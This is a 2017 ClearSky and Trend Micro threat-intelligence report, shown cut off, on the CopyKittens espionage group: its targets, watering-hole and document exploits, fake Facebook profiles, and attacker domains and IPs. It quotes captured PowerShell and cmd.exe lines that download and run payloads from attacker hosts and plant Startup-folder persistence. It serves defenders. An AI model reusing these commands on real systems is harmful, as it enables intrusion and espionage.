 

 

 

 

 

 

Operation 
Wilted Tulip 

 

Exposing a cyber espionage apparatus 

 

 

ClearSky Cyber Security  

Trend Micro 

July 2017 

 

 

Contents 

Introduction .......................................................................................................................................................... 3 

Targetting ..................................................................................................................................................... 3 

Malware ....................................................................................................................................................... 3 

Targeting ............................................................................................................................................................... 4 

Delivery and Infection .......................................................................................................................................... 5 

Watering Hole Attacks ..................................................................................................................................... 5 

Web-Based Exploitation ................................................................................................................................... 6 

Malicious Documents ....................................................................................................................................... 7 

Exploiting CVE-2017-0199 ............................................................................................................................ 7 

Embedded OLE Objects..............................................................................................................................11 

Malicious Macros .......................................................................................................................................15 

Fake Social Media Entities ..............................................................................................................................16 

Web Hacking ..................................................................................................................................................19 

Infrastructure Analysis ........................................................................................................................................20 

Domains .........................................................................................................................................................20 

IPs ...................................................................................................................................................................24 

Malware ..............................................................................................................................................................27 

TDTESS Backdoor............................................................................................................................................27 

Installation and removal ............................................................................................................................27 

Functionality ..............................................................................................................................................29 

Indicators of Compromise .........................................................................................................................30 

Vminst for Lateral Movement ........................................................................................................................31 

NetSrv – Cobalt Strike Loader ........................................................................................................................32 

Matryoshka v1 – RAT .....................................................................................................................................33 

Matreyoshka v2 – RAT ...................................................................................................................................33 

ZPP – File Compressor ....................................................................................................................................35 

Cobalt Strike ...................................................................................................................................................36 

Metasploit ......................................................................................................................................................37 

Empire Post-exploitation Framework ............................................................................................................38 

Indicators of Compromise ..................................................................................................................................39 

 

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 2 of 48 

 

Introduction 

CopyKittens  is  a  cyberespionage  group  that  has  been  operating  since  at  least  2013.  In  November  2015, 
ClearSky  and  Minerva  Labs  published1 the  first  public  report  exposing  its  activity.  In  March 2017,  ClearSky 
published a second report2 exposing further incidents, some of which impacted the German Bundestag. In this 
report, Trend Micro and ClearSky expose a vast espionage apparatus spanning the entire time the group has 
been  active.  It  includes  recent  incidents  as  well  as  older  ones  that  have  not  been  publicly  reported;  new 
malware; exploitation, delivery and command and control infrastructure; and the group's modus operandi. 
We dubbed this activity Operation Wilted Tulip  

Targetting 
CopyKittens  is  an  active  cyber  espionage  actor  whose  primary  focus  appears  to  be  foreign  espionage  on 
strategic  targets.  Its  main  targets  are  in  countries  such  as  Israel,  Saudi  Arabia,  Turkey,  The  United  States, 
Jordan, and Germany. Occasionally individuals in other countries are targeted as well as UN employees. 
Targeted  organizations  include  government  institutions  (such  as  Ministry  of  Foreign  Affairs),  academic 
institutions, defense companies, municipal authorities, sub-contractors of the Ministry of Defense, and large 
IT  companies.  Online  news  outlets  and  general  websites  were  breached  and  weaponized  as  a  vehicle  for 
watering hole attacks.  

For example, a malicious email was sent from a breached account of an employee in the Ministry of Foreign 
Affairs  in  the  Turkish  Republic  of  Northern  Cyprus,  trying  to  infect  multiple  targets  in  other  government 
organizations worldwide. In a different case, a document likely stolen from the Turkish Ministry of Foreign 
affairs was  used as decoy.  In other cases,  Israeli embassies were  targeted, as well as foreign embassies in 
Israel. 

Victims are targeted by watering hole attacks, and emails with links to malicious websites or with malicious 
attachments.  Fake  Facebook  profiles  have  been  used  for  spreading  malicious  links  and  building  trust  with 
targets. Some of the profiles have been active for years. 

Malware 
CopyKittens use several self-developed malware and hacking tools that have not been publicly reported to 
date, and are analyzed in this report: TDTESS backdoor; Vminst, a lateral movement tool; NetSrv, a Cobalt 
Strike  loader;  and  ZPP,  a  files  compression  console  program.  The  group  also  uses  Matryoshka  v1,  a  self-
developed RAT analyzed by ClearSky in the 2015 report, and Matryoshka v2 which is a new version, albeit with 
similar functionality. 

The group often uses the trial version of Cobalt Strike3, a publicly available commercial software for "Adversary 
Simulations and Red Team Operations." Other public tools used by the group are Metasploit, a well-known 
free and open source framework for developing and executing exploit code against a remote target machine; 
Mimikatz, a post-exploitation tool that performs credential dumping; and Empire, "a PowerShell and Python 
post-exploitation agent." For detection and exploitation of internet-facing web servers, CopyKittens use Havij, 
Acunetix and sqlmap.   

A notable characteristic of CopyKittens is the use of DNS for command and control communication (C&C) and 
for data exfiltration. This feature is available both in Cobalt Strike and in Matryoshka. 

Most of the infrastructure used by the group is in the U.S., Russia, and The Netherlands. Some of it has been 
in use for more than two years. 

                                                           

1 www.clearskysec.com/report-the-copykittens-are-targeting-israelis/  
2 www.clearskysec.com/copykitten-jpost/  
3  https://www.cobaltstrike.com  

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 3 of 48 

 

Targeting 

Based  on  Trend  Micro  Telemetry,  incident  response  engagements,  and  open  source  threat  intelligence 
investigations,  we  have  learned  of  CopyKittens  target  organizations  and  countries.  Its  main  targets  are  in 
countries  such  as  Israel,  Saudi  Arabia,  Turkey,  The  United  States,  Jordan,  and  Germany.  Occasionally 
individuals in other countries are targeted as well as UN employees. 

Targeted  organizations  include  government  institutions  (such  as  Ministry  of  Foreign  Affairs),  academic 
institutions, defense companies, municipal authorities, sub-contractors of the Ministry of Defense, and large 
IT  companies.  Online  news  outlets  and  general  websites  were  breached  and  weaponized  as  a  vehicle  for 
watering hole attacks. 

For example, a malicious email was sent from a breached account of an employee in the Ministry of Foreign 
Affairs  in  the  Turkish  Republic  of  Northern  Cyprus,  trying  to  infect  multiple  targets  in  other  government 
organizations worldwide. In a different case, a document likely stolen from the Turkish Ministry of Foreign 
affairs was  used as decoy.  In other cases,  Israeli embassies were targeted, as well as foreign embassies in 
Israel. 

Based on the size of the attack infrastructure and length of the campaign, we estimate that there have been 
at least a few hundred people infected in multiple organizations in the targeted countries. 

After infecting a computer within a target organization, the  attacker would move latterly using one of the 
malware descried in chapter "Malware." It seems that their objective is to gather as much information and 
data from target organizations as possible. They would indiscriminately exfiltrate large amounts of documents, 
spreadsheets, file containing personal data, configuration files and databases.  

In at least one case, the attackers breached an IT company, and used VPN access it had to client organizations 
to breach their networks.  

Often, victim organizations would learn of the breach due to the non-stealthy behavior of the attackers. The 
attackers would "get greedy," infecting multiple computers within the network of breached organizations. This 
would raise an alarm in various defense systems, making the victims initiate incident response operations.  

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 4 of 48 

 

Delivery and Infection  

CopyKittens attack their targets using the following methods: 

•  Watering hole attacks – inserting malicious JavaScript code into breached strategic websites. 

•  Web  based  exploitation  –  emailing  links  to  websites  built  by  the  attackers  and  containing  known 

exploits. 

•  Malicious documents – email attachments containing weaponized Microsoft Office documents.  

•  Fake social media entities – fake personal and organizational Facebook pages are used for interaction 

with targets and for information gathering. 

•  Web hacking – Havij, Acuntix and sqlmap are used to detect and exploit internet-facing web servers.   

These methods are elaborated below. 

Watering Hole Attacks 

On 30 March 2017, ClearSky reported a breach of multiple websites, such as Jerusalem Post, Maariv news and 
the IDF Disabled Veterans Organization website.4 JavaScript code was inserted into the breached websites, 
loading BeEF (Browser Exploitation Framework) from domains owned by the attackers .5 For example: 

 

The malicious code was loaded from one of the following addresses: 

Malicious code added to Maariv website 

https://js.jguery[.]net/jquery.min.js 
 https://js.jguery[.]online/jgueryui.min.js 

This would enable the attackers to perform actions such as browser fingerprinting and information gathering, 
social engineering  attacks (like  asking  for credentials,  redirect to another page, asking  the user to install  a 
malicious extension or malware), network reconnaissance, infecting the computer using Metasploit exploits, 
and more.6 The malicious code was served only when specific targets visited the website, likely based on IP 
whitelisting. 

Notably, prior to that publication, the German Federal Office for Information Security (BSI) said in a statement 
that it had investigated "problems in network traffic" of the German Bundestag.7 The statement concluded 
that the website of Israeli newspaper Jerusalem Post was manipulated and linked to a harmful third party in 
January 2017.  

                                                           

4 www.clearskysec.com/copykitten-jpost 
5 http://beefproject.com  
6 https://github.com/beefproject/beef/wiki  
7 https://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2017/Cyber-
Angriff_auf_den_Bundestag_Stellungnahme_29032017.html  

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 5 of 48 

 

Web-Based Exploitation  

In two incidents, the attackers breached the mailbox of a person related to a target organization. From this 
(real) account, they replied to previous correspondences with these organizations, adding a malicious link to 
a website registered and built by attackers: primeminister-goverment-techcenter].[tech. 8 

JavaScript  code,  at  least  parts  of  which  were  copied  from  public  sources,  fingerprinted  the  visitor's  web 
browser.9 This was likely used for later browser exploitation with known vulnerabilities.  

In some pages the code enumerates and collects a list of installed browser plugins, in others it tries to detect 
the real IP of the computer: 

Browser Plugins enumeration via JavaScipt code 

Internal IP detection with Java 

 

 

The data is sent to the attackers, and the victim is redirected to https://akamitechnology[.]com/. 

Collected data sent to server, then redirecting to new domain 

 

                                                           

8 https://blog.domaintools.com/2017/03/hunt-case-study-hunting-campaign-indicators-on-privacy-protected-attack-
infrastructure  
9 https://gist.github.com/kou1okada/2356972  

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 6 of 48 

 

JavaScript and Java code loaded into webpage, victim is redirected after 20 seconds 

 

Malicious Documents 

The  attackers  use  three  document  based  exploitation  types:  exploiting  CVE-2017-0199,  embedding  OLE 
objects, and macros. If the victim opens a document and the exploitation is successful (in the latter two, user 
interaction  might  be  required),  the  attackers  would  receive  access  to  the  computer  via  self-developed  or 
publicly available malware (see "Malware" chapter for more details).  

Exploiting CVE-2017-0199 

On 26 April 2017, a malicious email was sent from an employee account that was likely breached within the 
Ministry of  Northern Cyprus. It was sent to a disclosed recipients list  in government  institutions  in several 
countries  and  other  organizations,  mostly  in  or  related  to  ministries  of  foreign  affairs.  We  should  note, 
however, that it is possible that the attackers were interested only in a few of the recipient organizations, but 
sent it to a wider list because they showed up in previous correspondences in the breached account. 

Recipients were in the following domains: 

mofa.gov.vn 
mfa.gov.sg 
mfa.gov.tr 
post.mfa.uz 
mfa.am 
mfa.gov.by 
beijing.mfa.gov.il 
mofat.go.kr 
mfa.no 

athens.mfa.gov.il 
riga.mfa.sk 
amfam.com 
emfa.pt 
mfa.gov.il 
mfa.gov.mk 
bu.edu 
us.mufg.jp 
cyburguide.com 
newdelhi.mfa.gov.il 

hemofarm.co.yu 
mfat.govt.nz 
mfa.gr 
mfa.gov.lv 
mfa.gov.ua 
mfa.go.th 
mfa.gov.bn 
mfa.ee 
sbcglobal.net 
mfa.is 

  

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 7 of 48 

 

 

 

 

The email is presented below:10 

Redacted version of the malicious email sent form the Ministry of Foreign Affairs in the Turkish Republic of Northern 

Cyprus 

Attached to it was a document named "IRAN_NORTH-KOREA_Russia 20170420.docx".11 

Content of the malicious document 

 

The document exploited CVE-2017-0199, downloading an rtf file from: 

update.microsoft-office[.]solutions/license.doc 

The rtf file loads a VBA script from: 

http://38.130.75[.]20/check.html 

  

                                                           

10 https://www.virustotal.com/en/file/521687de405b2616b1bb690519e993a9fb714cecd488c168a146ff4bbf719f87/analysis/  
11 https://www.virustotal.com/en/file/026e9e1cb1a9c2bc0631726cacdb208e704235666042543e766fbd4555bd6950/analysis  

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 8 of 48 

 

Which runs a Cobalt Strike stager that communicates with: 

aaa.stage.14043411.email.sharepoint-microsoft[.]co 

In another case, the following document was uploaded to VirusTotal from Israel:12  

"The North Korean weapons program now testing USA range.docx" 

 
Content of the malicious document and a prompt that opens when external links are updated 

It downloads an rtf document from:  

http://update.microsoft-office[.]solutions/license.doc 

This downloads VBA code that runs a Cobalt Strike stager from the following addresses: 

http://38.130.75[.]20/error.html 

Pivoting  from  update.microsoft-office[.]solutions,  we  found  diagnose.microsoft-office[.]solutions,  which 
pointed  to  5.34.181.13.  Using  PassiveTotal  we  found  40.dc.c0ad.ip4.dyn.gsvr-static[.]co.  Googling  for  gsvr-
static[.]co, we found another sample, gpupdate.bat," which runs PowerShell code that extracts a Cobalt Strike 
stager.13:  

Base64 encoded PowerShell code that loads Cobalt Strike stager 

 

                                                           

12 https://www.virustotal.com/en/file/43fbf0cc6ac9f238ecdd2d186de397bc689ff7fcc8c219a7e3f46a15755618dc/analysis  
13 https://www.hybrid-analysis.com/sample/1f6e267a9815ef88476fb8bedcffe614bc342b89b4c80eae90e9aca78ff1eab8  

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 9 of 48 

 

The sample communicates with gsvr-static[.]co via DNS. 

 
DNS requests performed by the sample 

Yet in another case, malicious documents named “omnews.doc” and “pictures.doc” were served from the 
following locations: 

http://fetchnews-agency.news-bbc[.]press/en/20170/pictures.doc 
http://fetchnews-agency.news-bbc[.]press/omnews.doc 

The files load VBS from the following address: 

      http://fetchnews-agency.news-bbc[.]press/pictures.html 

Which runs a Cobalt Strike stager that communicates with: 

      a104-93-82-25.mandalasanati[.]info/iBpa 

From there, a Cobalt Strike beacon is loaded, communicating with: 

      s1w-amazonaws.office-msupdate[.]solutions 

 
 

 

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 10 of 48 

 

Embedded OLE Objects  

In February 2017 a document titled "ssl.docx" was delivered to targets, likely via email.14 It asked the recipient 
to "Please Update Your VPN Client from This Manual" [sic]. 

Content of the malicious document asking the victim to update the VPN Client 

 

The "VPN Client manual" was an embedded OLE binary object, an executable with a reverse file extension: 
checkpointsslvpn?fdp.exe. 15 (The  "?"  stands for an invisible Unicode character that  flips the direction of  the 
string, making it look like a PDF file "exe.pdf.")16 It was composed of two files: a self-extracting executable and 
a PDF. 

Bundled executable and PDF files 

  

They run via the following command: 

cmd.exe /c copy zWEC.tmp %userprofile%\desktop\Maariv_Tops.pdf&&copy Ma_1.tmp 
"%userprofile%\AppData\Roaming\Microsoft\Windows\Start 
Menu\Programs\Startup"\sourcefire.pif&&cd %userprofile%\desktop&&Maariv_Tops.pdf 

The PDF file is a decoy displayed to the victim during infection. It contains content copied on March 2017 from 
the public website of Maariv, a major Israeli news outlet.  

                                                           

14 
https://www.virustotal.com/en/file/b01e955a34da8698fae11bf17e3f79a054449f938257284155aeca9a2d38
15dd/analysis   
15 https://www.virustotal.com/en/file/72efda7309f8b24cd549f61f2b687951f30c9a45fda0fc3805c12409d0ba320a/analysis/  
16 Copykittens have used this this method before, for example in a document named "mfaformann?fdp.exe" 

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 11 of 48 

 

Content of the malicious PDF file, copied from Maariv website 

 

The self-extracting executable contains another executable, named p.exe, which was digitally signed with a 
stolen certificate of a legitimate company called AI Squared.  

Digital signature of p.exe 

 

Interestingly,  this  digital  certificate  was  used  by  a  threat  group  called  Oilrig.17 This  might  indicate  the  two 
groups share resources or otherwise collaborate in their activity.  

 

 

                                                           

17 http://www.clearskysec.com/oilrig/  

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 12 of 48 

 

The self-extracting executable serves as a downloader, running the following command: 

cmd.exe /c powershell.exe -nop -w hidden -c "((new-object 
net.webclient).downloadstring('http://jpsrv-java-jdkec2.javaupdate[.]co:80/JPOST'))" 

The C&C server sends back a short PowerShell code that loads a Cobalt Strike stager into memory. 

Base64 encoded PowerShell code that loads Cobalt Strike stager into memory 

 

Stager shellcode with marked user agent and C&C server address 

 

Both the docx and the executable contained the name shiranz in their metadata or file paths: 

LastModifiedBy shiranz 
C:\Users\shiranz\Desktop\checkpointsslvpn?fdp.exe 
C:\Users\shiranz\AppData\Local\Temp\checkpointsslvpn?fdp.exe 

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 13 of 48 

 

In another sample, the decoy document was in Turkish, indicating the target's nationality.18 This document 
was likely stolen from the Turkish Ministry of Foreign Affairs: test_fdp.exe.19 

Decoy document in Turkish  

 

While the decoy PDF document is opened, the following commands are executed: 

cmd.exe /c copy Ma_1.tmp "%userprofile%\AppData\Roaming\Microsoft\Windows\Start 
Menu\Programs\Startup"\CheckpointGO.pif&& copy sslvpn.tmp 
%userprofile%\desktop\sslvpnmanual.pdf&& cd %userprofile%\desktop&& sslvpnmanual.pdf 

cmd.exe /c powershell.exe -nop -w hidden -c "IEX ((new-object 
net.webclient).downloadstring('http://jpsrv-java-jdkec2.javaupdate[.]co:80/Sourcefire'))" 

 

 

                                                           

18 https://www.hybrid-analysis.com/sample/a4adbea4fcbb242f7eac48ddbf13c814d5eec9220f7dce01b2cc8b56a806cd37   
19 https://www.virustotal.com/en/file/a4adbea4fcbb242f7eac48ddbf13c814d5eec9220f7dce01b2cc8b56a806cd37/analysis  

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 14 of 48 

 

Malicious Macros 

In October 2016, the attackers uploaded to VirusTotal multiple files containing macros, likely to learn if they 
are detected by antivirus engines.  

For example, "Date.dotm" contains this default Word template content:20 

A default template of a Word document used as decoy 

 

The macro runs a Cobalt Strike stager that communicates with wk-in-f104.1c100.n.microsoft-security[.]host . 

The attackers also uploaded an executable files that would run a Word document with content in Hebrew.21 

Hebrew decoy document  

 

The word document contains a macro that runs the following command: 

cmd.exe  /c  powershell  -ExecutionPolicy  bypass  -noprofile  -windowstyle  hidden  (New-Object 
System.Net.WebClient).DownloadFile('http://pht.is.nlb-deploy.edge-dyn.e11.f20.ads-youtube. 
online/winini.exe','%TEMP%\XU.exe');&start %TEMP%\XU.exe& exit 

In parallel, the executable drops d5tjo.exe, which is the legitimate Madshi debugging tool 2223 

  

                                                           

20 https://www.virustotal.com/en/file/7e3c9323be2898d92666df33eb6e73a46c28e8e34630a2bd1db96aeb39586aeb/analysis/  
21 https://www.virustotal.com/en/file/9e5ab438deb327e26266c27891b3573c302113b8d239abc7f9aaa7eff9c4f7bb/analysis  
22 https://www.virustotal.com/en/file/7ad65e39b79ad56c02a90dfab8090392ec5ffed10a8e276b86ec9b1f2524ad31/analysis  
23 http://help.madshi.net/madExcept.htm  

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 15 of 48 

 

Fake Social Media Entities 

Back in 2013, CopyKittens used several Facebook profiles to spread links to a website impersonating Haaretz 
news, an Israeli  newspaper. In the screenshot  below you can see  the  fake profile  linking to haarettz.co[.]il 
(note the extra t in the domain). 

"Erick Brown"24 

"Amanda Morgan"25 

Fake profile "Erik Brown" posting link to malicious website  

Fake profile "Amanda Morgan" posting link to malicious website  

The latter profile tagged a fake Israeli profile as her cousin, "ןורש הניד"26 

 

 

Fake profile "

ןורש

 

הניד

" 

 

                                                           

24 https://www.facebook.com/israelhoughtonandplanetshakersphilippineconcert/posts/711649418845349  
25 https://www.facebook.com/ynetnews/posts/548075141952763 
26 https://www.facebook.com/profile.php?id=100003169608706 

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 16 of 48 

 

Who in turn tagged another fake Israeli profile as her cousin “ןהכ הקיסג”27 

Fake profile "

ןהכ

 

הקיסג

" 

 

While "Erik Brown" has not been publicly active since September 2015, and the two other Israeli profiles have 
not been publicly active since September 2013, Amanda Morgan is still active to date. She has thousands of 
friends and 2,630 followers, many of which are Israeli. In 2015 she sent her friends an invitation to Like a 
Facebook page: "Emet press." 

Amanda Morgan invites its friends to like "Emet press"  

 

Emet press (Emet means "truth" in Hebrew), is described as a non-biased news aggregator operated by Israeli 
students aboard. However, the Hebrew text is clearly not written by someone who speaks Hebrew as a first 
language:  

Emet press Facebook page 

 

                                                           

27 https://www.facebook.com/jessicacohe 

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 17 of 48 

 

The  page  re-posted  news  stories  in  Hebrew  copied  from  online  news  outlets  until  August  2016. 28  An 
accompanying website with similar content was published in www.emetpress[.]com. 

Emet press website 

 

Neither  the  Facebook  page  nor  website  have  been  used  to  spread  malicious  or  fake  content  publicly.  We 
estimate that they were used to build trust with targets,  and potentially send malicious content in private 
messages, however we do not have evidence of such activity. 

Looking at the website source code reveals that it was built with NovinWebGostar, a website building platform.  

Emet press source code reveals that it was built with NovinWebGostar  

 

NovinWebGostar belongs to an Iranian web development company with the same name. 

 

 

Website of Iranian web development company NovinWebGostar 

                                                           

28 https://www.facebook.com/emetpress  

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 18 of 48 

 

Web Hacking 

Based on logs from internet-facing web servers in target organizations, we have detected that CopyKittens use 
the following tools for web vulnerability scanning and SQL Injection exploitation. 

Havij: "An automatic SQL Injection tool, [which is] distributed by ITSecTeam, an Iranian security company."29 
Havij is freely distributed and has a graphical user interface. It is commonly used for automated SQL Injection 
and vulnerability assessments. 

sqlmap: An "automatic SQL Injection and database takeover tool."30 sqlmap is an open source penetration 
testing  tool  that  automates  the  process  of  detecting  and  exploiting  SQL  Injection  flaws  and  taking  over 
database servers. It is capable of database fingerprinting, data fetching from the database, and accessing the 
underlying file system and executing commands on the operating system via out-of-band connections. 

Acunetix: A commercial vulnerability scanner. "Acunetix tests for SQL Injection, XSS, XXE, SSRF, Host Header 
Injection and over 3000 other web vulnerabilities."31 

                                                           

29 http://blog.checkpoint.com/2015/05/14/analysis-havij-sql-injection-tool/  
30 http://sqlmap.org  
31 https://www.acunetix.com  

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 19 of 48 

 

Domains 

Infrastructure Analysis 

Below  is  a  list  of  domains  that  have  been  used  for  malware  delivery,  command  and  control,  and  hosting 
malicious websites since the beginning of the group's activity.32 

Domain 

israelnewsagency[.]link 

ynet[.]link 

fbstatic-akamaihd[.]com 

wheatherserviceapi[.]info 

windowkernel[.]com 

fbstatic-a[.]space 

gmailtagmanager[.]com 

mswordupdate17[.]com 

cachevideo[.]com 

cachevideo[.]online 

cloudflare-statics[.]com 

digicert[.]online 

fb-statics[.]com 

cloudflare-analyse[.]com 

twiter-statics[.]info 

winupdate64[.]com 

1m100[.]tech 

cloudmicrosoft[.]net 

windowslayer[.]in 

mywindows24[.]in 

wethearservice[.]com 

akamaitechnology[.]com 

ads-youtube[.]online 

akamaitechnology[.]tech 

alkamaihd[.]com 

alkamaihd[.]net 

qoldenlines[.]net 

1e100[.]tech 

ads-youtube[.]net 

azurewebsites[.]tech 

chromeupdates[.]online 

elasticbeanstalk[.]tech 

microsoft-ds[.]com 

trendmicro[.]tech 

fdgdsg[.]xyz 

Use 

NA 

NA 

Cobalt Strike DNS 

Cobalt Strike DNS 

Cobalt Strike DNS 

NA 

NA 

NA 

Cobalt Strike DNS 

Cobalt Strike DNS 

Cobalt Strike DNS 

Cobalt Strike DNS 

Cobalt Strike DNS 

Matreyoshka 

NA 

NA 

NA 

NA 

registration date 

Impersonated company/product 

26/06/2015 
 

04/09/2015 
 

 

 

 

Israeli News Agancy 

Ynet Israeli news outlet 

Akamai 

Generic 

Microsoft Windows 

Facebook 

Gmail 

03/10/2015 

Microsoft Windows 

13/12/2015 
 

 

 

 

 

 

 

Generic 

Generic 

Cloudflare 

DigiCert certificate authority 

Facebook 

Cloudflare 

Twitter 

Microsoft Windows 

10/04/2016 

Google 

19/04/2016 

Microsoft 

Matreyoshka 

06/06/2016 

Microsoft Windows 

NA 

 

Microsoft Windows 

Matreyoshka 

11/07/2016 

Cobalt Strike SSL / TDTESS  02/08/2016 

Generic 

Akamai 

Youtube 

Akamai 

Akamai 

Akamai 

Golden Lines (Israeli ISP) 

Google 

Youtube 

Microsoft Azure 

Google Chrome 

Amazon AWS Elastic Beanstalk 

Microsoft 

Trend Micro 

Cobalt Strike SSL 

Cobalt Strike SSL 

Cobalt Strike SSL 

Cobalt Strike SSL 

Cobalt Strike SSL 

NA 

NA 

NA 

NA 

NA 

NA 

NA 

NA 

 

 

 

 

 

 

 

 

 

 

 

 

03/08/2016 

Generic 

microsoft-security[.]host 

Cobalt Strike SSL 

09/08/2016 

Microsoft 

                                                           

32  Some have been reported in our previous public reports 

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 20 of 48 

 

Domain 

cissco[.]net 

cloud-analyzer[.]com 

f-tqn[.]com 

mcafee-analyzer[.]com 

microsoft-tool[.]com 

mpmicrosoft[.]com 

officeapps-live[.]com 

officeapps-live[.]net 

officeapps-live[.]org 

primeminister-goverment-techcenter[.]tech 

sdlc-esd-oracle[.]online 

jguery[.]online 

javaupdate[.]co 

jguery[.]net 

terendmicro[.]com 

windowskernel14[.]com 

gstatic[.]online 

ssl-gstatic[.]online 

broadcast-microsoft[.]tech 

newsfeeds-microsoft[.]press 

sharepoint-microsoft[.]co 

dnsserv[.]host 

nameserver[.]win 

nsserver[.]host 

owa-microsoft[.]online 

owa-microsoft[.]online 

gsvr-static[.]co 

winfeedback[.]net 

win-update[.]com 

intelchip[.]org 

ipresolver[.]org 

javaupdator[.]com 

labs-cloudfront[.]com 

outlook360[.]net 

updatedrivers[.]org 

outlook360[.]org 

windefender[.]org 

Use 

registration date 

Impersonated company/product 

Cobalt Strike DNS 

Cobalt Strike DNS 

Cobalt Strike DNS 

Cobalt Strike DNS 

Cobalt Strike DNS 

Cobalt Strike DNS 

Cobalt Strike DNS 

Cobalt Strike DNS 

Cobalt Strike DNS 

NA 

NA 

BEEF 

NA 

BEEF 

29/08/2016 
 

Cissco 

Cellebrite (?) 

 

 

 

 

 

 

 

Generic 

Mcafee 

Microsoft 

Microsoft 

Microsoft 

Microsoft 

Microsoft 

05/09/2016 

Israeli Prime Minister Office 

09/10/2016 

13/10/2016 

16/10/2016 

19/10/2016 

Oracle 

Jquery 

Oracle 

Jquery 

Cobalt Strike DNS 

12/12/2016 

Trend Micro 

NA 

NA 

NA 

Cobalt Strike DNS 

Cobalt Strike DNS 

Cobalt Strike DNS 

NA 

NA 

NA 

NA 

Cobalt Strike DNS 

20/12/2016 

Microsoft Windows 

28/12/2016 

 

18/01/2017 
 

 

 

 

 

 

 

Google 

Google 

Microsoft 

Microsoft 

Microsoft 

Generic 

Generic 

Generic 

Microsoft Outlook 

Microsoft Outlook 

NA 

13/02/2017 

Generic 

Cobalt Strike DNS 

Cobalt Strike DNS 

Cobalt Strike DNS 

Cobalt Strike DNS 

Cobalt Strike DNS 

Cobalt Strike DNS 

Cobalt Strike DNS 

Cobalt Strike DNS 

Cobalt Strike DNS 

Cobalt Strike DNS 

28/02/2017 
 

01/03/2017 
 

 

 

 

 

 

 

Microsoft Windows 

Microsoft Windows 

Intel 

Generic 

Generic 

Amazon CloudFront 

Microsoft Outlook 

Generic 

Microsoft Outlook 

Microsoft 

microsoft-office[.]solutions 

NA 

23/04/2017 

Microsoft 

gtld-servers.zone 

gtld-servers.solutions 

gtld-servers.services 

akamai-net.network 

azureedge-net.services 

cloudfront.site 

googlusercontent.center 

 

 

Cobalt Strike SSL 

Cobalt Strike SSL 

Cobalt Strike SSL 

NA 

NA 

NA 

NA 

Root DNS servers  

Root DNS servers  

Root DNS servers  

01/07/2017 

Akamai 

Microsoft Azure 

Cloudfront 

Google 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 21 of 48 

 

Domain 

windows-updates.network 

windows-updates.services 

akamaized.online 

cdninstagram.center 

netcdn-cachefly.network 

Use 

NA 

NA 

NA 

NA 

NA 

registration date 

Impersonated company/product 

Microsoft Windows 

Microsoft Windows 

Akamai 

01/07/2017 

Instegram 

CacheFly 

Noteworthy observations about the domains: 

•  Domains impersonate one of four categories: 

▪  Major internet and software companies and services – Microsoft, Google, Akamai, Cloudflare, 

Amazon, Oracle, Facebook, Cisco, Twitter, Intel 

▪  Security companies and products – Trend Micro, McAfee, Microsoft Defender, and potentially 

▪ 

Cellebrite 
Israeli organizations of interest to the victim – News originations, Israeli Prime Minister Office, 
an Israeli ISP 

▪  Other organizations or generic web services 

•  The attackers always use Whoisguard for Whois details protection.33 
•  Domains are usually registered in bulk every few months. 
• 

Long subdomains are created like those used by Content Delivery Networks. For example: 

wk-in-f104.1e100.n.microsoft-security[.]host 
ns1.static.dyn-usr.gsrv01.ssl-gstatic[.]online 
c20.jdk.cdn-external-ie.1e100.alkamaihd[.]net 
msnbot-sd7-46-194.microsoft-security[.]host 
ns2.static.dyn-usr.gsrv02.ssl-gstatic.online 
static.dyn-usr.g-blcse.d45.a63.alkamaihd[.]net 
ea-in-f155.1e100.microsoft-security[.]host 
is-cdn.edge.g18.dyn.usr-e12-as.akamaitechnology[.]com 
static.dyn-usr.f-login-me.c19.a23.akamaitechnology[.]com 
pht.is.nlb-deploy.edge-dyn.e11.f20.ads-youtube[.]online 
ae13-0-hk2-96cbe-1a-ntwk-msn.alkamaihd[.]com 
be-5-0-ibr01-lts-ntwk-msn.alkamaihd[.]com 
a17-h16.g11.iad17.as.pht-external.c15.qoldenlines[.]net 
•  Some of the domains have been in use for more than two years. 

                                                           

33 http://www.whoisguard.com/  

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 22 of 48 

 

Often the attackers would point malicious domains to IPs not in their control. For example, as can be seen in 
the screenshot below from PassiveTotal, multiple domains and hosts (marked red) were pointed to a non-
malicious IP owned by Google.3435  

Multiple domains and hosts pointing to a non-malicious IP owned by Google 

 

This pattern was instrumental for us in pivoting and detecting further malicious domains.  

Multiple domains and hosts pointing to a non-malicious IP owned by Google 

 

                                                           

34 https://passivetotal.org/search/172.217.20.78  

35 https://passivetotal.org/search/172.217.0.227  

 

 

©All rights reserved to ClearSky cyber security and Trend Micro, 2017 

Page 23 of 48 

 

IPs 

The table below lists IPs used by the attackers, how they were used, and their autonomous system name and 
number.36 Notably, most are hosted in the Russian Federation, United States, and Netherlands. 

IP 

Use 

Country 

AS name 

206.221.181.253  Cobalt Strike 

United States 

Choopa  LLC 

66.55.152.164 

Cobalt Strike 

United States 

Choopa  LLC 

68.232.180.122 

Cobalt Strike 

United States 

Choopa  LLC 

173.244.173.11  Metasploit and web hacking 

United States 

173.244.173.12  Metasploit and web hacking 

United States 

173.244.173.13  Metasploit and web hacking 

United States 

209.190.20.149 

209.190.20.59 

209.190.20.62 

